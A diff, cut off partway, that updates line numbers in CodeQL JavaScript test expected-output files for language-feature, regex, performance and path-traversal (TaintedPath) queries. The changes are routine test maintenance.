a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected @@ -1,3 +1,3 @@ -| tst.js:2:1:2:8 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:2:14:2:20 | 'array' | array | -| tst.js:19:9:19:16 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:23:6:23:11 | 'null' | null | -| tst.js:33:2:33:9 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:33:16:33:22 | 'array' | array | +| tst.js:1:1:1:8 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:1:14:1:20 | 'array' | array | +| tst.js:18:9:18:16 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:21:6:21:11 | 'null' | null | +| tst.js:30:2:30:9 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:30:16:30:22 | 'array' | array | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected index f3c95f56d3d2..01e87bf5c177 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected @@ -3,4 +3,4 @@ | letExpr.js:3:13:3:38 | let (x ... ) x + y | Use let declarations instead of let expressions. | | letStmt.js:3:1:5:1 | let (x ... + y);\\n} | Use let declarations instead of let statements. | | postfixComprehension.js:2:15:2:38 | [i*i fo ... mbers)] | Use prefix comprehensions instead of postfix comprehensions. | -| tst.js:2:15:2:31 | function(x) x * x | Use arrow expressions instead of expression closures. | +| tst.js:1:15:1:31 | function(x) x * x | Use arrow expressions instead of expression closures. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected index 2af10be24c0d..c9b2667e9e74 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected @@ -1,7 +1,7 @@ -| tst.js:2:17:2:32 | i <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:3:15:3:21 | args[i] | read | -| tst.js:7:17:7:32 | args.length >= i | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:8:15:8:21 | args[i] | read | -| tst.js:18:5:18:20 | j <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:19:15:19:21 | args[j] | read | -| tst.js:23:5:23:20 | args.length >= j | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:24:15:24:21 | args[j] | read | -| tst.js:34:19:34:31 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:35:9:35:12 | a[i] | read | -| tst.js:51:9:51:21 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:51:43:51:46 | a[i] | read | -| tst.js:51:26:51:38 | i <= b.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:51:52:51:55 | b[i] | read | +| tst.js:1:17:1:32 | i <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:2:15:2:21 | args[i] | read | +| tst.js:5:17:5:32 | args.length >= i | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:6:15:6:21 | args[i] | read | +| tst.js:15:5:15:20 | j <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:16:15:16:21 | args[j] | read | +| tst.js:19:5:19:20 | args.length >= j | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:20:15:20:21 | args[j] | read | +| tst.js:29:19:29:31 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:30:9:30:12 | a[i] | read | +| tst.js:46:9:46:21 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:46:43:46:46 | a[i] | read | +| tst.js:46:26:46:38 | i <= b.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:46:52:46:55 | b[i] | read | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected index 2f61724a5661..740b5e5dafe7 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected @@ -1,11 +1,11 @@ -| NonLinearPatternTS.ts:1:34:1:39 | number | The pattern variable 'number' appears to be a type, but is a variable $@. | NonLinearPatternTS.ts:1:23:1:28 | number | previously bound | -| ts-test.ts:3:13:3:13 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:3:10:3:10 | x | previously bound | -| ts-test.ts:8:16:8:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:8:10:8:10 | x | previously bound | -| ts-test.ts:11:10:11:10 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:11:7:11:7 | x | previously bound | -| ts-test.ts:21:8:21:13 | string | The pattern variable 'string' appears to be a type, but is a variable $@. | ts-test.ts:20:8:20:13 | string | previously bound | -| ts-test.ts:32:16:32:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:30:12:30:12 | x | previously bound | -| ts-test.ts:34:20:34:20 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:30:12:30:12 | x | previously bound | -| ts-test.ts:40:27:40:32 | string | Repeated binding of pattern variable 'string' $@. | ts-test.ts:40:16:40:21 | string | previously bound | -| tst.js:3:13:3:13 | x | Repeated binding of pattern variable 'x' $@. | tst.js:3:10:3:10 | x | previously bound | -| tst.js:8:16:8:16 | x | Repeated binding of pattern variable 'x' $@. | tst.js:8:10:8:10 | x | previously bound | -| tst.js:11:10:11:10 | x | Repeated binding of pattern variable 'x' $@. | tst.js:11:7:11:7 | x | previously bound | +out| NonLinearPatternTS.ts:1:34:1:39 | number | The pattern variable 'number' appears to be a type, but is a variable $@. | NonLinearPatternTS.ts:1:23:1:28 | number | previously bound | +| ts-test.ts:2:13:2:13 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:2:10:2:10 | x | previously bound | +| ts-test.ts:6:16:6:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:6:10:6:10 | x | previously bound | +| ts-test.ts:8:10:8:10 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:8:7:8:7 | x | previously bound | +| ts-test.ts:18:8:18:13 | string | The pattern variable 'string' appears to be a type, but is a variable $@. | ts-test.ts:17:8:17:13 | string | previously bound | +| ts-test.ts:29:16:29:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:27:12:27:12 | x | previously bound | +| ts-test.ts:31:20:31:20 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:27:12:27:12 | x | previously bound | +| ts-test.ts:37:27:37:32 | string | Repeated binding of pattern variable 'string' $@. | ts-test.ts:37:16:37:21 | string | previously bound | +| tst.js:2:13:2:13 | x | Repeated binding of pattern variable 'x' $@. | tst.js:2:10:2:10 | x | previously bound | +| tst.js:6:16:6:16 | x | Repeated binding of pattern variable 'x' $@. | tst.js:6:10:6:10 | x | previously bound | +| tst.js:8:10:8:10 | x | Repeated binding of pattern variable 'x' $@. | tst.js:8:7:8:7 | x | previously bound | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected index 9dcd49a99d3f..75d8c23b51f6 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected @@ -1,3 +1,3 @@ -| tst.js:2:1:2:3 | (0) | Assignment to property foo of a primitive value with type number. | -| tst.js:11:5:11:5 | s | Assignment to a property of a primitive value with type string. | -| tst.js:17:3:17:3 | x | Assignment to property y of a primitive value with type number or string. | +| tst.js:1:1:1:3 | (0) | Assignment to property foo of a primitive value with type number. | +| tst.js:8:5:8:5 | s | Assignment to a property of a primitive value with type string. | +| tst.js:13:3:13:3 | x | Assignment to property y of a primitive value with type number or string. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected index bf01936dd730..30532ee8c952 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected @@ -1,2 +1,2 @@ -| tst.js:15:3:15:12 | set x(v ... OK\\n\\t\\t} | This setter function does not use its parameter $@. | tst.js:15:9:15:9 | v | v | -| tst.js:40:3:40:25 | set y(_ ... _x\|0; } | This setter function does not use its parameter $@. | tst.js:40:9:40:10 | _y | _y | +| tst.js:15:3:15:12 | set x(v) {\\n\\t\\t} | This setter function does not use its parameter $@. | tst.js:15:9:15:9 | v | v | +| tst.js:38:3:38:25 | set y(_ ... _x\|0; } | This setter function does not use its parameter $@. | tst.js:38:9:38:10 | _y | _y | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected index a5e92e24b4bd..2b911b330b6c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected @@ -1 +1 @@ -| tst.js:15:3:15:16 | return "nope"; | Useless return statement in setter function. | +| tst.js:14:3:14:16 | return "nope"; | Useless return statement in setter function. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected index 92b3fc978773..b88dd7d68e80 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected @@ -8,17 +8,17 @@ | reflection.js:7:15:7:18 | 1 | Superfluous arguments passed to $@. | reflection.js:1:1:1:23 | functio ... eturn;} | function f0 | | reflection.js:12:18:12:18 | 2 | Superfluous argument passed to $@. | reflection.js:2:1:2:24 | functio ... eturn;} | function f1 | | thisparameter.ts:4:11:4:12 | 45 | Superfluous argument passed to $@. | thisparameter.ts:1:1:1:45 | functio ... eturn;} | function foo | -| tst.js:11:3:11:5 | g() | Superfluous argument passed to $@. | tst.js:1:1:4:1 | functio ... x+19;\\n} | function f | -| tst.js:33:15:33:18 | 2 | Superfluous arguments passed to $@. | externs.js:34:1:34:27 | functio ... str) {} | function String | -| tst.js:37:4:37:5 | 42 | Superfluous argument passed to $@. | tst.js:38:4:38:23 | function() {return;} | anonymous function | -| tst.js:46:19:46:20 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | -| tst.js:70:11:70:12 | 42 | Superfluous argument passed to $@. | tst.js:49:2:51:2 | functio ... urn;\\n\\t} | function nonEmpty | -| tst.js:75:13:75:14 | 42 | Superfluous argument passed to $@. | tst.js:63:19:63:33 | () => undefined | function emptyArrow | -| tst.js:76:31:76:32 | 42 | Superfluous argument passed to $@. | tst.js:64:33:64:32 | () {} | default constructor of class ImplicitEmptyConstructor | -| tst.js:77:31:77:32 | 42 | Superfluous argument passed to $@. | tst.js:67:14:68:3 | (){\\n\\t\\t} | constructor of class ExplicitEmptyConstructor | -| tst.js:78:20:78:21 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | -| tst.js:114:20:114:21 | 42 | Superfluous argument passed to $@. | tst.js:82:2:86:2 | functio ... \\n\\t\\t}\\n\\t} | function notAPlainThrower1 | -| tst.js:115:20:115:21 | 42 | Superfluous argument passed to $@. | tst.js:87:2:90:2 | functio ... .");\\n\\t} | function notAPlainThrower2 | -| tst.js:116:20:116:21 | 42 | Superfluous argument passed to $@. | tst.js:91:2:94:2 | functio ... .");\\n\\t} | function notAPlainThrower3 | -| tst.js:120:23:120:24 | 87 | Superfluous argument passed to $@. | tst.js:102:2:104:2 | functio ... (p);\\n\\t} | function throwerWithParam | -| tst.js:121:18:121:19 | 42 | Superfluous argument passed to $@. | tst.js:105:2:113:2 | functio ... )();\\n\\t} | function throwerIndirect | +| tst.js:10:3:10:5 | g() | Superfluous argument passed to $@. | tst.js:1:1:4:1 | functio ... x+19;\\n} | function f | +| tst.js:31:15:31:18 | 2 | Superfluous arguments passed to $@. | externs.js:34:1:34:27 | functio ... str) {} | function String | +| tst.js:34:4:34:5 | 42 | Superfluous argument passed to $@. | tst.js:35:4:35:23 | function() {return;} | anonymous function | +| tst.js:43:19:43:20 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | +| tst.js:67:11:67:12 | 42 | Superfluous argument passed to $@. | tst.js:46:2:48:2 | functio ... urn;\\n\\t} | function nonEmpty | +| tst.js:72:13:72:14 | 42 | Superfluous argument passed to $@. | tst.js:60:19:60:33 | () => undefined | function emptyArrow | +| tst.js:73:31:73:32 | 42 | Superfluous argument passed to $@. | tst.js:61:33:61:32 | () {} | default constructor of class ImplicitEmptyConstructor | +| tst.js:74:31:74:32 | 42 | Superfluous argument passed to $@. | tst.js:64:14:65:3 | (){\\n\\t\\t} | constructor of class ExplicitEmptyConstructor | +| tst.js:75:20:75:21 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | +| tst.js:111:20:111:21 | 42 | Superfluous argument passed to $@. | tst.js:79:2:83:2 | functio ... \\n\\t\\t}\\n\\t} | function notAPlainThrower1 | +| tst.js:112:20:112:21 | 42 | Superfluous argument passed to $@. | tst.js:84:2:87:2 | functio ... .");\\n\\t} | function notAPlainThrower2 | +| tst.js:113:20:113:21 | 42 | Superfluous argument passed to $@. | tst.js:88:2:91:2 | functio ... .");\\n\\t} | function notAPlainThrower3 | +| tst.js:117:23:117:24 | 87 | Superfluous argument passed to $@. | tst.js:99:2:101:2 | functio ... (p);\\n\\t} | function throwerWithParam | +| tst.js:118:18:118:19 | 42 | Superfluous argument passed to $@. | tst.js:102:2:110:2 | functio ... )();\\n\\t} | function throwerIndirect | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected index 967ac1ce58f3..7141c9d5589e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected @@ -1,7 +1,7 @@ -| tst.js:5:30:5:45 | arguments.callee | Strict mode code cannot use arguments.callee. | -| tst.js:7:21:7:36 | arguments.callee | Strict mode code cannot use arguments.callee. | -| tst.js:9:20:9:27 | f.caller | Strict mode code cannot use Function.prototype.caller. | -| tst.js:11:17:11:27 | f.arguments | Strict mode code cannot use Function.prototype.arguments. | -| tst.js:18:10:18:25 | arguments.callee | Strict mode code cannot use arguments.callee. | -| tst.js:31:12:31:21 | foo.caller | Strict mode code cannot use Function.prototype.caller. | -| tst.js:31:12:31:21 | foo.caller | Strict mode code cannot use arguments.caller. | +| tst.js:4:30:4:45 | arguments.callee | Strict mode code cannot use arguments.callee. | +| tst.js:5:21:5:36 | arguments.callee | Strict mode code cannot use arguments.callee. | +| tst.js:6:20:6:27 | f.caller | Strict mode code cannot use Function.prototype.caller. | +| tst.js:7:17:7:27 | f.arguments | Strict mode code cannot use Function.prototype.arguments. | +| tst.js:13:10:13:25 | arguments.callee | Strict mode code cannot use arguments.callee. | +| tst.js:25:12:25:21 | foo.caller | Strict mode code cannot use Function.prototype.caller. | +| tst.js:25:12:25:21 | foo.caller | Strict mode code cannot use arguments.caller. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/YieldInNonGenerator.expected b/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/YieldInNonGenerator.expected index 4439f2c694b6..6efbbf8544bc 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/YieldInNonGenerator.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/YieldInNonGenerator.expected @@ -1 +1 @@ -| tst.js:5:9:5:21 | yield index++ | This yield expression is contained in $@ which is not marked as a generator. | tst.js:1:1:1:8 | function | function idMaker | +| tst.js:4:9:4:21 | yield index++ | This yield expression is contained in $@ which is not marked as a generator. | tst.js:1:1:1:8 | function | function idMaker | diff --git a/javascript/ql/test/query-tests/Performance/NonLocalForIn/NonLocalForIn.expected b/javascript/ql/test/query-tests/Performance/NonLocalForIn/NonLocalForIn.expected index 5718da0e961c..22e149651e78 100644 --- a/javascript/ql/test/query-tests/Performance/NonLocalForIn/NonLocalForIn.expected +++ b/javascript/ql/test/query-tests/Performance/NonLocalForIn/NonLocalForIn.expected @@ -1,5 +1,5 @@ -| tst.js:14:10:14:15 | q[i++] | This loop may prevent optimization because its iteration variable is a property. | -| tst.js:19:10:19:10 | p | This loop may prevent optimization because its iteration variable is a global variable. | -| tst.js:24:10:24:14 | var p | This loop may prevent optimization because its iteration variable is captured. | -| tst.js:34:14:34:14 | p | This loop may prevent optimization because its iteration variable is captured. | -| tst.js:40:10:40:10 | p | This loop may prevent optimization because its iteration variable is a global variable. | +| tst.js:13:10:13:15 | q[i++] | This loop may prevent optimization because its iteration variable is a property. | +| tst.js:17:10:17:10 | p | This loop may prevent optimization because its iteration variable is a global variable. | +| tst.js:21:10:21:14 | var p | This loop may prevent optimization because its iteration variable is captured. | +| tst.js:30:14:30:14 | p | This loop may prevent optimization because its iteration variable is captured. | +| tst.js:35:10:35:10 | p | This loop may prevent optimization because its iteration variable is a global variable. | diff --git a/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/ReassignParameterAndUseArguments.expected b/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/ReassignParameterAndUseArguments.expected index 4886857477f0..a4dd7cac42e7 100644 --- a/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/ReassignParameterAndUseArguments.expected +++ b/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/ReassignParameterAndUseArguments.expected @@ -1 +1 @@ -| tst.js:2:18:2:22 | start | This parameter $@, which may prevent optimization because the surrounding function uses the arguments object. | tst.js:4:9:4:13 | start | is reassigned | +| tst.js:1:18:1:22 | start | This parameter $@, which may prevent optimization because the surrounding function uses the arguments object. | tst.js:3:9:3:13 | start | is reassigned | diff --git a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected index 2210f9711682..52d3597bb637 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected +++ b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected @@ -1 +1 @@ -| tst.js:4:17:4:18 | \\2 | This back reference always matches the empty string, since it refers to $@, which is contained in a $@. | tst.js:4:11:4:14 | (a+) | this capture group | tst.js:4:8:4:16 | (?!(a+)b) | negative lookahead assertion | +| tst.js:3:17:3:18 | \\2 | This back reference always matches the empty string, since it refers to $@, which is contained in a $@. | tst.js:3:11:3:14 | (a+) | this capture group | tst.js:3:8:3:16 | (?!(a+)b) | negative lookahead assertion | diff --git a/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected b/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected index d2acad5b7659..69c471955218 100644 --- a/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected +++ b/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected @@ -1,4 +1,4 @@ -| tst.js:4:2:4:3 | \\1 | There is no capture group 1 in this regular expression. | -| tst.js:8:13:8:14 | \\1 | There is no capture group 1 in this regular expression. | -| tst.js:15:16:15:17 | \\2 | There is no capture group 2 in this regular expression. | -| tst.js:16:16:16:29 | \\k | There is no capture group named 'whitespace' in this regular expression. | +| tst.js:3:2:3:3 | \\1 | There is no capture group 1 in this regular expression. | +| tst.js:6:13:6:14 | \\1 | There is no capture group 1 in this regular expression. | +| tst.js:12:16:12:17 | \\2 | There is no capture group 2 in this regular expression. | +| tst.js:13:16:13:29 | \\k | There is no capture group named 'whitespace' in this regular expression. | diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected index 2b0eaa5e3a03..d9382b86a625 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected @@ -1,3 +1,3 @@ -| tst.js:2:4:2:4 | ^ | This assertion can never match. | -| tst.js:11:5:11:5 | ^ | This assertion can never match. | -| tst.js:20:5:20:5 | ^ | This assertion can never match. | +| tst.js:1:4:1:4 | ^ | This assertion can never match. | +| tst.js:9:5:9:5 | ^ | This assertion can never match. | +| tst.js:16:5:16:5 | ^ | This assertion can never match. | diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected index 6e57f22c18a7..a380a81c2744 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected @@ -1,4 +1,4 @@ -| tst.js:2:10:2:10 | $ | This assertion can never match. | -| tst.js:11:3:11:3 | $ | This assertion can never match. | -| tst.js:20:3:20:3 | $ | This assertion can never match. | -| tst.js:38:6:38:6 | $ | This assertion can never match. | +| tst.js:1:10:1:10 | $ | This assertion can never match. | +| tst.js:9:3:9:3 | $ | This assertion can never match. | +| tst.js:16:3:16:3 | $ | This assertion can never match. | +| tst.js:33:6:33:6 | $ | This assertion can never match. | diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected index 8f1786508a59..bfb374411b6a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected @@ -4,159 +4,159 @@ nodes | TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | semmle.label | parse(r ... ).query | | TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | semmle.label | parse(r ... ry.path | | TaintedPath-es6.js:7:20:7:26 | req.url | semmle.label | req.url | -| TaintedPath-es6.js:10:26:10:45 | join("public", path) | semmle.label | join("public", path) | -| TaintedPath-es6.js:10:41:10:44 | path | semmle.label | path | +| TaintedPath-es6.js:9:26:9:45 | join("public", path) | semmle.label | join("public", path) | +| TaintedPath-es6.js:9:41:9:44 | path | semmle.label | path | | TaintedPath.js:9:7:9:48 | path | semmle.label | path | | TaintedPath.js:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | | TaintedPath.js:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | | TaintedPath.js:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | | TaintedPath.js:9:24:9:30 | req.url | semmle.label | req.url | -| TaintedPath.js:12:29:12:32 | path | semmle.label | path | -| TaintedPath.js:15:29:15:48 | "/home/user/" + path | semmle.label | "/home/user/" + path | -| TaintedPath.js:15:45:15:48 | path | semmle.label | path | -| TaintedPath.js:18:33:18:36 | path | semmle.label | path | -| TaintedPath.js:21:33:21:36 | path | semmle.label | path | -| TaintedPath.js:24:33:24:36 | path | semmle.label | path | -| TaintedPath.js:33:31:33:34 | path | semmle.label | path | -| TaintedPath.js:38:3:38:44 | path | semmle.label | path | -| TaintedPath.js:38:10:38:33 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:38:10:38:39 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:38:10:38:44 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:38:20:38:26 | req.url | semmle.label | req.url | -| TaintedPath.js:42:29:42:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:42:48:42:51 | path | semmle.label | path | -| TaintedPath.js:46:29:46:49 | pathMod ... n(path) | semmle.label | pathMod ... n(path) | -| TaintedPath.js:46:45:46:48 | path | semmle.label | path | -| TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | -| TaintedPath.js:48:51:48:54 | path | semmle.label | path | -| TaintedPath.js:50:29:50:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:50:50:50:53 | path | semmle.label | path | -| TaintedPath.js:52:29:52:56 | pathMod ... , path) | semmle.label | pathMod ... , path) | -| TaintedPath.js:52:52:52:55 | path | semmle.label | path | -| TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | semmle.label | pathMod ... ath, x) | -| TaintedPath.js:54:49:54:52 | path | semmle.label | path | -| TaintedPath.js:56:29:56:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:56:48:56:51 | path | semmle.label | path | -| TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | -| TaintedPath.js:58:54:58:57 | path | semmle.label | path | -| TaintedPath.js:60:29:60:61 | pathMod ... h(path) | semmle.label | pathMod ... h(path) | -| TaintedPath.js:60:57:60:60 | path | semmle.label | path | -| TaintedPath.js:65:31:65:70 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:65:31:65:76 | require ... ).query | semmle.label | require ... ).query | -| TaintedPath.js:65:63:65:69 | req.url | semmle.label | req.url | -| TaintedPath.js:66:31:66:68 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:66:31:66:74 | require ... ).query | semmle.label | require ... ).query | -| TaintedPath.js:66:61:66:67 | req.url | semmle.label | req.url | -| TaintedPath.js:67:31:67:67 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:67:31:67:73 | require ... ).query | semmle.label | require ... ).query | -| TaintedPath.js:67:60:67:66 | req.url | semmle.label | req.url | -| TaintedPath.js:75:48:75:60 | req.params[0] | semmle.label | req.params[0] | -| TaintedPath.js:84:6:84:47 | path | semmle.label | path | -| TaintedPath.js:84:13:84:36 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:84:13:84:42 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:84:13:84:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:84:23:84:29 | req.url | semmle.label | req.url | -| TaintedPath.js:86:28:86:48 | fs.real ... c(path) | semmle.label | fs.real ... c(path) | -| TaintedPath.js:86:44:86:47 | path | semmle.label | path | -| TaintedPath.js:87:14:87:17 | path | semmle.label | path | -| TaintedPath.js:88:32:88:39 | realpath | semmle.label | realpath | -| TaintedPath.js:89:45:89:52 | realpath | semmle.label | realpath | -| TaintedPath.js:120:6:120:47 | path | semmle.label | path | -| TaintedPath.js:120:13:120:36 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:120:13:120:42 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:120:13:120:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:120:23:120:29 | req.url | semmle.label | req.url | -| TaintedPath.js:122:23:122:26 | path | semmle.label | path | -| TaintedPath.js:126:7:126:48 | path | semmle.label | path | -| TaintedPath.js:126:14:126:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:126:14:126:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:126:14:126:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:126:24:126:30 | req.url | semmle.label | req.url | -| TaintedPath.js:128:19:128:22 | path | semmle.label | path | -| TaintedPath.js:130:7:130:29 | split | semmle.label | split | -| TaintedPath.js:130:15:130:18 | path | semmle.label | path | -| TaintedPath.js:130:15:130:29 | path.split("/") | semmle.label | path.split("/") | -| TaintedPath.js:132:19:132:23 | split | semmle.label | split | -| TaintedPath.js:132:19:132:33 | split.join("/") | semmle.label | split.join("/") | -| TaintedPath.js:136:19:136:23 | split | semmle.label | split | -| TaintedPath.js:136:19:136:26 | split[x] | semmle.label | split[x] | -| TaintedPath.js:137:19:137:35 | prefix + split[x] | semmle.label | prefix + split[x] | -| 